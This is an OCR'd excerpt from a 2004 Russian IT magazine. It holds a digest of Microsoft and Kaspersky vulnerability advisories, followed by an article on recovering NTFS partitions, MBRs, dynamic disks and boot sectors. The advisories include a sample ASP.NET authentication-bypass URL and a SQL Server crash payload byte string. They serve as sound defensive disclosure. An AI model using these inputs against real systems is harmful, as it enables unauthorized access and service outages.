http://httpd.apache.org/download.cgi?update=200409150645.
Уязвимость канонизации в ASP.NET
Программа: Microsoft .NET Framework 1.x.
Опасность: средняя.
Описание: Уязвимость связана с ошибкой канонизации внут-
ри .NET authentication schema. В результате возможно обой-
ти аутентификацию на основе форм или WIndows-аутенти-
фикацию, используя специально обработанный URL:
http://[victim]/secure%5Cfile.apx
Уязвимость воздействует на все версии ASP.NET для
всех версий IIS.
URL производителя: http://support.microsoft.com/?kbid=
887459.
Решение: Установите обновление: http://www.microsoft.com/
downloads/details.aspx?FamilyId=DA77B852-DFA0-4631-
AAF9-8BCC6C743026.
78
Две уязвимости в различных версиях
Microsoft Windows
Опасность: критическая.
Описание: В различных версиях Microsoft Windows обна-
ружена уязвимость в пути, которым Windows Shell запуска-
ет приложения. Удаленный атакующий может сконструиро-
вать специально обработанный веб-сайт, чтобы выполнить
произвольный код на системе целевого пользователя, по-
сетившего этот сайт.
Вторая уязвимость обнаружена в обработке специаль-
ных запросов в Program Group Converter. Атакующий мо-
жет сконструировать специально обработанный запрос,
чтобы выполнить произвольный код на системе целевого
пользователя, выполняющего некоторые действия типа от-
крытия прикрепленного файла или клика на html-ссылку.
URL производителя: www.Microsoft.com.
Решение: Установите соответствующее обновление.
Удаленный отказ в обслуживании
в Microsoft SQL Server 7.0
Программа: Microsoft SQL Server 7.0 SP3 и более ранние
версии.
Опасность: средняя.
Описание: Отказ в обслуживании обнаружен в Microsoft
SQL Server 7.0. Удаленный пользователь может предста-
вить чрезмерно большой буфер со специально обработан-
ными данными (700 000 байтовый буфер, за которым сле-
дует строка \x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\
xcc\xcc\xcc\xcc ), чтобы аварийно завершить работу служ-
бы mssqlserver.
URL производителя: http://www.microsoft.com.
Решение: Способов устранения обнаруженной уязвимос-
ти не существует в настоящее время.
Удаленный отказ в обслуживании
в Microsoft Windows NT/2000/XP
Опасность: средняя.
Описание: Уязвимость обнаружена в Microsoft Windows NT/
2000/XP: переполнение буфера в службе NetDDE. Уязви-
мость позволяет удаленному атакующему выполнить про-
извольный код на уязвимой системе с SYSTEM-привилеги-
ями. Служба NetDDE по умолчанию отключена.
URL производителя: Microsoft.com.
Решение: Установите соответствующее обновление.
Обход парольной защиты
в Kaspersky Anti-Virus
Программа: Kaspersky Anti-Virus 5.0.149, 5.0.153.
Опасность: низкая.
Описание: Локальный пользователь может работать с при-
ложением типа RAMcleaner, чтобы загрузить KAV.exe без
аутентификации. Затем пользователь может изменить на-
стройки конфигурации.
URL производителя: http://www.kaspersky.com.
Решение: Способов устранения обнаруженной уязвимос-
ти не существует в настоящее время.
Составил Александр Антипов
 образование
ВОССТАНОВЛЕНИЕ ДАННЫХ НА NTFS-РАЗДЕЛАХ
ЧАСТЬ 2
Сегодня мы продолжим говорить о восстановлении
данных, сосредоточив свое внимание на загрузочных
секторах, таблицах разделов, динамических дисках
и всех сопутствующих им служебных структурах.
Master boot record – базовые концепции
Первые жесткие диски были небольшого (даже по тем вре-
менам) размера и форматировались практически так же,
как и дискеты, однако их объемы стремительно росли, и
MS-DOS уже не могла их целиком адресовать. Для преодо-
ления этого ограничения был введен механизм разделов
(partitions), разбивающий один физический диск на несколь-
ко логических, каждый из которых имел свою собственную
файловую систему и форматировался независимо от дру-
гих. За счет чего это достигается?
В первом секторе физического диска (цилиндр 0/голов-
80
КРИС КАСПЕРСКИ
ка 0/сектор 1) хранится специальная структура данных –
master boot record (главная загрузочная запись) или сокра-
щенно MBR. Она состоит из двух основных частей – пер-
вичного загрузчика (master boot code) и таблицы разделов
(partition table), описывающей схему разбиения и геомет-
рию каждого из логических дисков. В конце сектора по сме-
щению 1FE находится сигнатура 55h AAh, по которой BIOS
определяет признак «загрузочности» сектора. Даже если
вы не хотите дробить свой винчестер на части и формати-
руете его как один диск, присутствие master boot record обя-
зательно.

Ðèñóíîê 1. Ñõåìàòè÷íîå ïðåäñòàâëåíèå ðàçáèòîãî äèñêà
При старте компьютера BIOS выбирает загрузочный
винчестер (обычно Primary Master, но порядок загрузки в
большинстве BIOS можно изменять, а самые продвинутые
из них при удержании ESC во время прохождения post (про-
цесса начального тестирования оборудования) даже выво-
дят интерактивное меню), считывает первый сектор в па-
мять по адресу 0000h:7C00h, проверяет наличие сигнату-
ры 55h AAh в его конце, и если такая сигнатура действи-
тельно обнаруживается, передает управление на
0000h:7C000h. В противном случае анализируется следую-
щее загрузочное устройство, а если таковое отсутствует,
выдается ругательное сообщение.
Первичный загрузчик, получив управление, сканирует
partition table (которая уже загружена в память!), находит
активный раздел (Boot Indicator === 80h), извлекает номер
стартового сектора раздела, также называемого boot-сек-
тором, загружает его в память по адресу 0000h:7C00h (пред-
варительно переместив свое тело в другое место, чтобы
избежать затирания), убеждается в наличии сигнатуры
55h AAh, передавая управление по 0000h:7C00h, в против-
ном случае выдается ругательное сообщение, и после на-
жатия на клавишу компьютер перезагружается. Некоторые
загрузчики поддерживают несколько активных разделов,
последовательно перебирая их один за другим, но это уже
отсебятина разработчиков, выходящих за стандартные спе-
цификации Microsoft, что, впрочем, никого не смущает.
Если первичный загрузчик поврежден, то BIOS не смо-
жет запустить операционную систему с такого диска, одна-
ко при подключении его «вторым» (или загрузке с диске-
ты) все логические диски будут доступны. Как минимум они
должны быть «видны», т.е. команды C:, D:, E: выполняются
нормально, правда, работоспособность команды dir уже не
гарантируется. Во-первых, для этого файловая система
соответствующего раздела должна быть известна загру-
женной операционной системе и не повреждена, а во-вто-
рых, должен быть цел boot-сектор (но об этом позже).
Partition Table, которую анализирует master boot code, а
чуть позже – драйвер логических дисков операционной сис-
темы, состоит из четырех 10h-записей, расположенных по
смещению 1BEh, 1CEh, 1DEh, 1EEh байт от начала диска
соответственно. Каждая из них описывает свой логический
раздел, задавая его стартовый и конечный сектора, запи-
санные в CHS-формате (да! даже если диск работает в LBA-
режиме, патриции все равно адресуются через CHS!). Поле
относительного смещения раздела, отсчитываемое от нача-
ла таблицы разделов, является вспомогательным, и его из-
быточность очевидна. То же самое относится и к полю с об-
щим количеством секторов на диске – как будто это нельзя
вычислить на основе стартового и конечного секторов! Одни
операционные системы и загрузчики игнорируют вспомога-
тельные поля, другие же их активно используют, поэтому они
должны соответствовать действительности.
1
Термин автора.
№10(23), октябрь 2004
образование
Поле идентификатора диска содержит уникальную 32-
разрядную последовательность, помогающую операцион-
ной системе отличить один смонтированный диск от друго-
го и автоматически копирующую в следующий ключ реест-
ра: HKLM\SYSTEM\MountedDevices. На самом деле Windows
свободно обходится и без него, поэтому содержимое этого
поля некритично.
Поле Boot ID содержит идентификатор файловой сис-
темы, установленной на разделе, который в случае NTFS
равен 07h. За динамическими дисками согласно фирмен-
ной спецификации закреплен идентификатор 42h. На са-
мом деле это справедливо лишь для тех из них, что получе-
ны путем обновления (update) обычного раздела до дина-
мического. Сведения об остальных динамических дисках в
таблице разделов не хранятся, а содержатся в последнем
мегабайте физического диска в LDM-базе, и для стандарт-
ных дисковых менеджеров они не видны. При установке
операционной системы семейства Windows 9х или UNIX на
винчестер, содержащий динамические диски, они могут
быть необратимо утеряны, поскольку согласно таблице раз-
делов занятое ими пространство отмечено как свободное.
Тем не менее загрузочный логический диск (независимо
от того, динамический он или нет) в обязательном порядке
должен присутствовать в partition table, иначе BIOS не смо-
жет его загрузить.
Четырех записей partition table, обеспечивающих всего
четыре логических диска, явно не хватало, но расширять
таблицу разделов было уже некуда – последняя запись упи-
ралась в конец сектора, а использовать следующий сектор
разработчикам не хотелось, поскольку его активно исполь-
зовали многие вирусы и нестандартные драйвера, к тому
же это все равно не решало проблемы, а лишь оттягивало
конец. Тогда инженеры нашли другое решение, предложив
концепцию расширенных разделов (Extended partition). Если
boot ID некоторого раздела равен 05h или 0Fh, он тракту-
ется как «виртуальный физический диск»1 со своей соб-
ственной partition table, расположенной в его начале, на ко-
торую и указывает стартовый сектор расширенного разде-
ла. Короче говоря, таблица разделов получается вложен-
ной, и уровень вложения ограничен разве что свободным
местом жесткого диска и количеством стековой памяти заг-
рузчика (при условии, что он использует рекурсивный ал-
горитм сканирования). Таблица разделов как бы размазы-
вается вдоль винчестера. Большинство утилит резервиро-
вания сохраняют лишь первый сектор, чего явно недоста-
точно (впрочем, первый сектор гибнет намного чаще дру-
гих, так что даже плохая политика резервирования лучше,
чем совсем ничего).
Ðèñóíîê 2. Ðàñøèðåííàÿ òàáëèöà ðàçäåëîâ
Штатные утилиты разбивки (FDISK.EXE, Disk Manager)
в каждой таблице разделов создают один основной и один
расширенный раздел. То есть при разбиении винчестера
на четыре логических диска на нем образуются четыре
partition table (см. листинг 4), хотя в данном случае можно
81
 образование
было бы обойтись и одной. Штатный загрузчик FDISK тре-
бует, чтобы активный раздел находился в первом секторе
partition table, «благодаря» чему операционная система мо-
жет грузиться только с диска C:. Нестандартные менедже-
ры, анализирующие всю цепочку разделов, позволяют заг-
ружаться с любого из разделов. Самые честные из них со-
здают в первой partition table еще один раздел (благо если
диск был разбит FDISK, свободное место там всегда есть),
назначают его активным и помещают в него свое тело. Дру-
гие же внедряются непосредственно в MBR, замещая пер-
вичный загрузчик, что создает очевидные проблемы совме-
стимости.
Òàáëèöà 1. Ôîðìàò MBR
Òàáëèöà 2. Ôîðìàò partition
Òàáëèöà 3. Âîçìîæíûå çíà÷åíèÿ Boot ID
Если таблица разделов повреждена, логические диски,
скорее всего, будут полностью недоступны – они не ото-
бражаются в «Моем Компьютере», не появились в панели
«Driver» файлового менеджера FAR, а команда C: вызыва-
ет ошибку. Искажение таблицы разделов не приводит к не-
медленному изменению объема уже отформатированных
томов (т.к. он хранится в boot-секторе и картах свободного
пространства), но при последующем переформатировании
произойдет затирание данных из соседнего раздела или
же текущий раздел окажется усечен. Кстати говоря, если
расширенный раздел указывает сам на себя или на один
из предшествующих разделов в цепочке, все известные мне
операционные системы наглухо зависнут еще на этапе заг-
рузки, даже если диск подключен «вторым». Чтобы испра-
82
вить ситуацию, необходимо запустить редактор диска или
другую утилиту, а для этого необходимо загрузить опера-
ционную систему! Существует несколько путей выхода из
этой, казалось бы, неразрешимой проблемы. Самое про-
стое – горячее подключение диска на ходу с последующей
работой с ним через BIOS или порты ввода/вывода. Если
ни диск, ни материнская плата не умеют (а для IDE-уст-
ройств подключение «на лету» представляется довольно
жестким испытанием!), вы сможете запустить доктора и ра-
ботать с диском на физическом уровне. Другой «хакерский»
путь, – пропатчить MS-DOS, изменив сигнатуру 55h AAh на
что-нибудь еще, тогда она не сможет распознать таблицу
разделом и, стало быть, не станет ее анализировать. Как
вариант можно записать в boot-сектор дискеты специаль-
но подготовленную программу, которая обнуляет MBR или
искажает сигнатуру, расположенную в его конце. Просто
загрузитесь с нее и все!
Ëèñòèíã 1. Ïðèìåð òàáëèöû ðàçäåëîâ, ñôîðìèðîâàííûé ïðî-
ãðàììîé FDISK
Master boot record – техника
восстановления
Существует множество утилит для автоматического восста-
новления master boot code и partition table (Get Data Back,
Easy Recovery, Active Data Recovery Software и т. д.). До
некоторого времени они вполне успешно справлялись со
своей задачей, восстанавливая даже полностью уничтожен-
ные таблицы разделов, однако с появлением емких вин-

тов, преодолевших барьер в 2 Гб с помощью всевозмож-
ных расширений, они стали часто путаться, и потому дове-
рять им нельзя. Если не хотите потерять свои данные – вос-
станавливайте MBR самостоятельно (тем более что это
достаточно простая операция, не требующая особой ква-
лификации). Восстановление значительно упрощается,
если в вашем распоряжении имеется копия таблицы раз-
делов, снятая Sector Inspector или подобными ей утилита-
ми. Однако чаще всего ее все-таки нет…
Если операционная система отказывается загружать-
ся, а на экране появляется ругательство от BIOS типа «Disk
Boot failure, Non-System disk or disk error... Press Enter to
restart», это указывает на разрушение сигнатуры 55h AAh,
обычно сопровождаемое смертью первичного загрузчика.
Внимание! Очень важно отличать сообщение BIOS от со-
общений первичного загрузчика и boot-сектора. Зайдите в
BIOS Setup и отключите все загрузочные устройства, оста-
вив активным только диск A: с вытащенной дискетой. А те-
перь перезагрузитесь и запомните, какое сообщение по-
явится на экране. Это и будет ругательством BIOS.
Восстановить сигнатуру 55h AAh можно в любом диско-
вом редакторе. Когда будете это делать, убедитесь, что в
начале диска присутствуют осмысленный master boot code
(если вы испытываете затруднение с дизассемблировани-
ем в уме, воспользуйтесь IDA PRO или HIEW). Вы не умее-
те дизассемблировать? Тогда попробуйте оценить степень
«нормальности» первичного загрузчика визуально (одна-
ко для этого опять-таки требуется опыт работы с кодом). В
начале более или менее стандартного загрузчика располо-
жено приблизительно 100h байт машинного кода, в кото-
ром обнаруживаются последовательности: 00 7С, 1B 7C,
BE 07, CD 13, CD 18, CD 10, 55 AA, а затем идут характер-
ные текстовые сообщения: «Invalid partition table, Error
loading operating system, Missing operating system...» ну или
подобные им. Если загрузчик поврежден, но сигнатура
55 AA цела, то попытка загрузки с такого диска обернется
неизменным зависанием.
Восстановить «слетевший» или искореженный первич-
ный загрузчик можно с помощью утилиты FDISK.EXE, запу-
щенной с ключом /MBR, записывающей в главную загрузоч-
Проблема нулевой дорожки
Главная загрузочная запись жестко держит за собой первый
сектор, и если он вдруг окажется разрушенным, работа с
таким диском станет невозможной. До недавнего времени
проблема решалась посекторным копированием винчесте-
ра с переносом данных на здоровый жесткий диск с иден-
тичной геометрией с последующим восстановлением MBR.
Сейчас ситуация изменилась. Современные винчесте-
ры поддерживают возможность принудительного замеще-
ния плохих секторов из резервного фонда (а некоторые
делают это автоматически), поэтому проблема нулевой
дорожки, преследующая нас еще со времен гибких дисков
и 8-разрядных машин, наконец перестала существовать.
Механизм замещения секторов все еще не стандарти-
зирован и осуществляется утилитами, предоставляемыми
производителем конкретной модели винчестера. Чаще все-
го они распространяются бесплатно и могут быть свободно
найдены в сети.
№10(23), октябрь 2004
образование
ную запись первого диска стандартный master boor code, или
командой FIXMBR консоли аварийного восстановления в
Windows 2000 (недокументированный ключ /CMBR, появив-
шийся в MS-DOS 7.0, позволяет выбирать любой из подклю-
ченных дисков). Внимание! Если вы использовали нестан-
дартный загрузчик (такой, например, как LILO), то после пе-
резаписи MBR сможете загружаться только с основного раз-
дела, а для запуска операционных систем из других разде-
лов вам придется переустановить свой мультизагрузочный
менеджер (вообще-то такой менеджер можно написать и
самостоятельно, при наличии HIEW, а лучше использовать
транслятор ассемблера – работа не займет и получаса).
Как уже говорилось, некоторые загрузчики изменяют
схему трансляции адресов жесткого диска, и со штатным
загрузчиком такой диск будет полностью неработоспосо-
бен. Попробуйте переустановить загрузчик с дистрибутив-
ных дисков – быть может, это поможет. В противном слу-
чае ничего не остается, как писать свой собственный заг-
рузчик, определять текущую геометрию диска и соответ-
ствующим образом транслировать секторные адреса. Это
довольно сложная задача, требующая серьезной подготов-
ки, и здесь ее лучше не обсуждать.
Если загрузчик говорит «Invalid partition table», это еще
не значит, что таблица разделов повреждена, просто ни
один из основных разделов не назначен активным. Такое
случается при использовании нестандартных загрузчиков,
загружающих операционную систему из расширенного
раздела. После выполнения команды FDISK /MBR или при
установке операционной системы, автоматически заменя-
ющей первичный загрузчик своим собственным, он не об-
наружит в пределах досягаемости ни одного активного
раздела, и, естественно, разразится многоэтажным руга-
тельством. Такое поведение, в частности, характерно для
Windows 98. Для решения проблемы либо восстановите
прежний загрузчик, либо установите операционную сис-
тему на первичный раздел и, запустив FDISK, сделайте
его активным.
Загрузитесь с системной дискеты (другого винчестера,
CD-диска) и посмотрите, видны ли ваши логические диски
или нет. Если да, то смело переходите к следующему пунк-
Ëèñòèíã 2. Âíåøíèé âèä òèïè÷íîãî MBR-ñåêòîðà
83
 образование
ту, в противном случае соберитесь с духом и приготовь-
тесь немного поработать руками и головой.
Восстановление основного раздела, созданного FDISK
или Disk Manager, в большинстве случаев осуществляется
элементарно, а остальные, как правило, восстанавливать
и не требуется, поскольку именно MBR гибнет чаще всего,
а расширенные патриции, рассредоточенные по диску, уми-
рают разве что при явном удалении разделов средствами
FDISK/Disk Manager.
Адрес стартового сектора первого логического диска
всегда равен 0/1/1 (Cylinder/Head/Sector), относительный
(Relative) сектор – количеству головок жесткого диска,
уменьшенных на единицу (сведения о геометрии диска мож-
но почерпнуть из любого дискового редактора, в том числе
и Sector Inspector). Конечный сектор определить несколько
сложнее. Если загрузочный сектор цел (см. «Загрузочный
сектор – техника восстановления»), то узнать количество
секторов в разделе патриции (total sectors) можно и из поля
BootRecord.NumberSectors, увеличив его значение на еди-
ницу. Тогда конечный цилиндр будет равен:
LastCyl := TotalSectors/(Heads*SecPerTrack)
где Heads – количество головок на физическом диске, а
SecPerTrack – количество секторов на трек.
Конечная головка равна:
LastHead := (Total Sector – ↵
(LastCyl*Heads SecPerTrack))/SecPerTrack
а конечный сектор равен:
LastSec :== (Total Sector – ↵
(LastCyl*Heads SecPerTrack)) % SecPerTrack
Пропишите полученные значения в MBR и посмотрите,
не находится ли за вычисленным концом раздела следую-
щий раздел? Это должна быть либо расширенная таблица
Типы динамических дисков,
поддерживаемые Windows 2000
! Простые (simple): практически ничем не отличаются от
обычных разделов, за исключением того, что при пере-
разбиении диска отпадает необходимость в перезагруз-
ке. Базовый тип для всех остальных динамических дис-
ков.
Избыточность: нет.
Эффективность: низкая.
! Составные (spanned): состоят из одного или несколь-
ких simple-дисков, находящихся в различных разделах
или даже устройствах, представленные как один логи-
ческий диск. Данные на simple-диски пишутся последо-
вательно (классический линейный RAID).
Избыточность: нет.
Эффективность: низкая.
! Чередующиеся (stripped): то же самое, что и spanned,
но данные записываются параллельно на все simple-
диски при условии, что они расположены на различных
каналах IDE-контроллера. Это значительно увеличива-
ет скорость обмена данными, короче говоря, классичес-
кий RAID уровня 0.
84
разделов, либо boot-сектор. Если это так, создайте еще одну
запись в partition table, заполнив его соответствующим об-
разом.
А если boot-сектор отсутствует и не может быть восста-
новлен, реально ли восстановить таблицу разделов или
нет? Да, можно. Необходимо лишь найти boot или partition
следующих разделов, в чем вам поможет контекстный по-
иск. Ищите сектора, содержащие сигнатуру 55h AAh в кон-
це. Отличить boot от partition очень просто (в boot-секторе
по смещению два байта от его начала расположен иденти-
фикатор производителя (NTFS, MSWIN4.1 и т. д.). Логично,
что размер текущего раздела на один сектор меньше, а зная
размер и геометрию диска, можно рассчитать и конечный
цилиндр/головку/сектор.
Только учтите, что Windows хранит копию boot-сектора,
которая в зависимости от версии может быть расположена
либо в середине раздела, либо в его конце. Другие копии
могут находиться в архивных файлах и файле подкачки.
Кстати говоря, посмотрите, не содержится ли среди них
ничего удобоваримого. Как отличить копию сектора от ори-
гинала? Если это подлинник, вслед за ним пойдут служеб-
ные структуры файловой системы (в частности, для NTFS
таблица MFT, каждая запись которой начинается с легко
узнаваемой строки FILE*). Собственно говоря, поскольку
служебные структуры файловой системы обычно распола-
гаются на более или менее предсказуемом смещении от-
носительно начала раздела, то отталкиваясь от их «геогра-
фического» расположения, мы можем установить размеры
каждого из логических дисков, даже если все boot/partition
уничтожены.
Что произойдет, если границы разделов окажутся оп-
ределенными неверно? Если мы переборщим, увеличив
размер раздела сверх необходимого, все будет нормально
работать, поскольку карта свободного пространства хра-
нится в специальной структуре (у NTFS это файл $bitmap,
а у FAT13/32 – непосредственно сама FAT-таблица) и «зап-
Избыточность: нет.
Эффективность: средняя.
! Зеркальные (mirrored): два simple-диска, расположенные
на разных устройствах, данные дублируются на оба но-
сителя (RAID уровня 1).
Избыточность: средняя.
Эффективность: средняя.
! Чередующиеся с контролем четности (stripped with party):
соответствует массиву RAID уровня 5. Состоит из трёх
или более дисков. Представляет собой stripped volume
с контролем ошибок. Данные пишутся на два диска, в
два блока, а на третий диск и в третий блок записыва-
ется ECC, код коррекции ошибок, с помощью которого
по информации любого из блоков можно восстановить
содержимое второго блока.
Избыточность: высокая.
Эффективность: высокая.
! Зеркальный с чередованием (mirrored striped): соответ-
ствует массиву RAID 1+0.
Избыточность: средняя.
Эффективность: высокая.

редельные» сектора будут добавлены только после пере-
форматирования раздела. Если все, что нам нужно, – это
скопировать данные с восстанавливаемого диска на дру-
гой носитель, то возиться с подгонкой параметров partition
table не нужно! Распахните ее на весь физический диск и
дело с концом!
Естественно, такой способ восстановления подходит
только для первого раздела диска, а для всех последую-
щих нам потребуется определить стартовый сектор. Это
определение должно быть очень точным, поскольку все
структуры файловой системы адресуются от начала логи-
ческого диска и ошибка в один-единственный сектор сде-
лает весь этот тонкий механизм полностью неработоспо-
собным. К счастью, некоторые из структур ссылаются сами
на себя, давая нам ключ к разгадке. В частности, файлы
$mft/$mftmiff содержат номер своего первого кластера. Сто-
ит нам найти первую запись FILE*, как мы узнаем, на каком
именно секторе мы сейчас находимся (конечно, при усло-
вии, что сумеем определить количество секторов на клас-
тер, но это уже другая тема – см. раздел «Загрузочный сек-
тор – базовые концепции»).
Динамические диски
Динамические диски, впервые появившиеся в Windows 2000, –
это все тот же программный RAID, призванный преодолеть
ограничения стандартных механизмов разбиения с учетом
ошибок своего прямого предшественника программного RAID
Windows NT, хранящего конфигурационную информацию в
системном реестре, что, во-первых, препятствовало его пе-
ремещению с машины на машину, а во-вторых, делало очень
уязвимым к порче реестра.
По умолчанию Windows создает базовые диски (см. рас-
шифровку терминов в таблице 5), но всякий базовый диск
в любой момент времени может быть обновлен до динами-
ческого (это даже не потребует перезагрузки). Динамичес-
кие диски не пользуются таблицей разделов, а потому и не
имеют проблем, связанных с ограничением CHS-разрядно-
сти и позволяют создавать тома практически неограничен-
ного размера. Однако динамические диски, созданные пу-
тем обновления основных разделов, все-таки остаются в
partition table, при этом их Boot ID меняется на 42h. Если эта
информация окажется удалена, система откажется подклю-
чать такой динамический диск. Кстати говоря, Windows
может быть установлена только на обновленный динами-
ческий диск, поскольку BIOS может загружать систему лишь
с тех разделов, которые перечислены в partition table, а ди-
намические диски, созданные «на лету», в нее как раз и не
попадают.
Схема разбиения динамических дисков содержится в
Базе Менеджера Логических Дисков – Logical Disk Manager
Database или сокращенно LDM. Это протоколируемая
(journalled) база данных, поддерживающая транзакции и ус-
тойчивая к сбоям. Если в процессе манипуляции с томами
неожиданно исчезнет питание, при последующем включе-
нии компьютера будет выполнен откат в предыдущее со-
стояние. При переносе винчестера, содержащего один или
несколько динамических дисков, на другую систему, они
автоматически распознаются и монтируются, как обыкно-
венные диски.
№10(23), октябрь 2004
образование
LMD-база хранится в последнем мегабайте жесткого
диска, а для дисков, полученных путем обновления базо-
вого раздела до динамического, – в последнем мегабайте
этого самого раздела, идентификатор системы Boot ID со-
ответствующей записи в Partition Table принимает значе-
ние 42h. Так происходит потому, что при стандартном раз-
биении винчестера в его конце просто не остается свобод-
ного места и операционной системе приходится сохранять
эту информацию непосредственно в самом обновляемом
диске (естественно, для этого в нем должен быть свободен
по меньшей мере 1 Мб).
Сразу же за таблицей разделов по адресу 0/0/2 распо-
ложен приватный заголовок PRIVHEAD, содержащий в
себе ссылки на основные структуры LDM (см. рис. 3). Если
PRIVHEAD погибнет, Windows не сможет обнаружить и
смонтировать динамические диски. А гибнет он удручаю-
ще часто. Подавляющее большинство загрузочных виру-
сов и дисковых менеджеров считают сектор 0/0/2 свобод-
ным и используют его для хранения своего тела, необра-
тимо затирая прежнее содержимое. Осознавая значимость
PRIVHEAD, разработчики из Microsoft сохранили его аж в
двух копиях, одна из которых хранится в хвосте LDM, а
другая – в последнем секторе физического диска. Благо-
даря такой избыточности, PRIVHEAD практически никог-
да не приходится восстанавливать вручную, но если это
все-таки потребуется сделать, обратитесь к проекту LINUX-
NTFS за подробным описанием его структуры (http://linux-
ntfs.sourceforge.net), здесь же оно по соображениям эко-
номии места не приводится.
Ðèñóíîê 3. LDM-áàçà è åå äèñëîêàöèÿ
Внутреннее устройство LDM-базы недокументировано
и буквально пышет мощью и сложностью. Наверху иерар-
хии расположено оглавление базы – структура TOCBLOCK
(Table Of Content Block), состоящая из двух секций config и
log (вероятно, в будущем их список будет расширен). Сек-
ция config содержит информацию о текущем разбиении
динамических дисков и сведения о томах, а log хранит жур-
нал изменений схемы разбивки. Это очень мощное сред-
ство в борьбе с энтропией! Если удалить один или несколь-
ко динамических разделов, информация о старом разбие-
нии сохранится в журнале и утерянные тома могут быть с
легкостью восстановлены! Будучи очень важной структу-
рой, оглавление диска защищено от случайного разруше-
ния тремя копиями, одна из которых вплотную примыкает к
настоящему TOCBLOCK, расположенному в начале LDM-
базы, а две другие находятся в конце диска, между копия-
ми PRIVHEAD.
Внутренняя секция config состоит из заголовка (VMDB)
и одного или нескольких VBLKs – специальных 128-байто-
вых структур данных, каждая из которых описывает соот-
ветствующий ей том, контейнер, раздел, диск или группу
дисков. VMDB-заголовок не имеет копии и нигде не дубли-
руется, однако все его изменения протоколируются в жур-
нале (KLOG) и потому могут быть восстановлены.
85
 образование
Строение VMDB и VBLs подробно документировано
«LMD Documentation», находящейся на сайте LINUX-NTFS
и потому описывать его здесь нет никакой необходимости
(оно слишком громоздко, к тому же крайне маловероятно,
что кому-то потребуется восстанавливать секцию config ру-
ками).
Ðèñóíîê 4. Âíóòðè LDM
Для просмотра LDM-базы и архивирования ее содержи-
мого можно воспользоваться утилитой LDM-dump Марка
Руссиновича, бесплатную копию которой можно скачать с
его сайта (http://www.sysinternals.com/files/ldmdump.zip). Как
вариант – можно зарезервировать последний мегабайт фи-
зического диска и последний мегабайт всех патриций, чей
Boot ID равен 42h любым подходящим дисковым редакто-
ром (например, Sector Inspector) и сохранить эту информа-
цию на надежном носителе (Zip, СD-R/RW), не забывая так-
же зарезервировать и TOCBLOCK.
При восстановлении удаленных динамических дисков
следует учитывать, что, во-первых, журнал изменений на
интерфейсном уровне недоступен и выполнить откат ле-
гальными средствами операционной системы невозможно.
Во-вторых, boot-сектор удаляемых дисков автоматически
очищается и восстанавливать его приходится вручную, о
чем мы чуть позже и поговорим.
Если размер и тип удаленного динамического диска вам
известен (на NTFS-дисках его можно извлечь из копии boot-
сектора), просто зайдите в «Менеджер Управления Диска-
ми» и воссоздайте его заново, от предложения отформати-
ровать раздел любезно откажитесь и восстановите очищен-
ный boot-сектор по методике, описанной ниже.
Как видно, Microsoft тщательно позаботилась о своих
пользователях и занималась проектированием структуры
динамических дисков на свежую голову, что для нее вооб-
ще говоря нехарактерно.
Òàáëèöà 4. Òåðìèíîëîãè÷åñêîå ñîîòâåòñòâèå äèíàìè÷åñêèõ
è îáû÷íûõ äèñêîâ
Загрузочный сектор – базовые
концепции
Первый сектор логического диска носит название загрузоч-
ного (boot). Он содержит самозагрузочный код (bootstrap
code) и важнейшие сведения о геометрии диска, без кото-
рых раздел просто не будет смонтирован! Структура boot-
сектора определяется архитектурными особенностями кон-
кретной файловой системы, в частности NTFS boot sector
выглядит так:
86
Òàáëèöà 5. Ñòðîåíèå NTFS boot-ñåêòîðà
В начале всякого сектора расположена трехбайтовая
машинная команда перехода на bootstrap code (обычно
EB 52 90, хотя возможны и вариации). Так происходит по-
тому, что при загрузке boot-сектора в память управление
передается на его первый байт, а bootstrap код по туман-
ным историческим соображениям был отодвинут в конец
сектора (для NTFS верхняя граница составляет 54h байт),
вот и приходится прыгать блохой!
С третьего по одиннадцатый байты (считая от нуля) хра-
нится идентификатор производителя, определяющий тип и
версию используемой файловой системы (например,
«MSDOS5.0» для FAT16, «MSWIN4.0»/«MSWIN4.1» для FAT32
и «NTFS» для NTFS). Если это поле окажется искажено,
драйвер не сможет смонтировать диск и даже может по-
считать его не отформатированным! (примечание: с FAT-
дисками Windows 2000 будет работать даже с запорченным
OEM ID, чего не скажешь про NTFS).
Следом за идентификатором расположен 25-байтовый
блок параметров BIOS (BIOS Parameter Block или сокра-
щенно BPB), хранящий сведения о геометрии диска (число
цилиндров, головок, секторов, размер сектора, количество
секторов в кластере и т. д.). Если эта информация окажет-
ся утеряна или искажена, нормальное функционирование
драйвера файловой системы станет невозможным. Причем
если данное число цилиндров/головок/секторов дублирует
информацию, содержащуюся в MBR, а при ее утере эле-
ментарно восстанавливается описанным выше способом,
то размер кластера определить не так-то просто! Позже мы
обсудим этот вопрос более подробно, пока же ограничим-
ся следующей табличкой, сообщающей размер кластера
NTFS-томов, выбираемой штатной утилитой форматирова-
ния по умолчанию (см. таблицу 7).
При выборе размера кластера вручную, Windows 2000
поддерживает следующий модельный ряд: 1, 2, 4, 8, 16, 32,
64 и 128 секторов. Чем больше размер кластера, тем мень-
ше фрагментация и выше предельно адресуемый диско-
вый объем, но вместе с тем и выше потери от грануляции.
Впрочем, ручное задание размеров кластера встречается
достаточно редко.
Òàáëèöà 6. Ðàçìåð êëàñòåðà, âûáèðàåìûé Windows 2000 ïî óìîë÷àíèþ
К блоку параметров BIOS вплотную примыкает его про-
должение – extended BPB, хранящий номер первого клас-
тера MFT, ее размер в кластерах, номер кластера с зерка-
лом MFT и некоторую другую информацию. В отличие от
FAT16/32, MFT может располагаться в любом месте диска
(для борьбы с BAD-секторами это актуально). При нормаль-
ном развитии событий MFT располагается практически в
самом начале диска (где-то в районе 4 кластера) и если
только она не была перемещена, ее легко найти глобаль-

ным поиском (строка «FILE*» по смещению 0 от начала сек-
тора). При разрушении или некорректном заполнении extend
PBP драйвер файловой системы отказывается монтировать
раздел, объявляя его неотформатированным.
Следом за extend PBP идет Bootstrap Code, который
ищет на диске операционный загрузчик (у Windows NT это
ntldr), загружает его в память и передает ему управление.
Если Bootstrap Code отсутствует, загрузка операционной
системы становится невозможной, однако, при подключе-
нии восстанавливаемого диска вторым раздел должен быть
прекрасно виден. Порча Bootstrap Code вызывает перезаг-
рузку компьютера или его зависание.
И завершает boot-сектор уже известная нам сигнатура
55h AAh, без которой он ни за что не будет признан загру-
зочным.
Òàáëèöà 7. Çíà÷åíèå ïîëåé NTFS boot-ñåêòîðà
Загрузочный сектор – техника
восстановления
Осознавая значимость загрузочного сектора, Windows NT
при форматировании диска создает его зеркальную копию
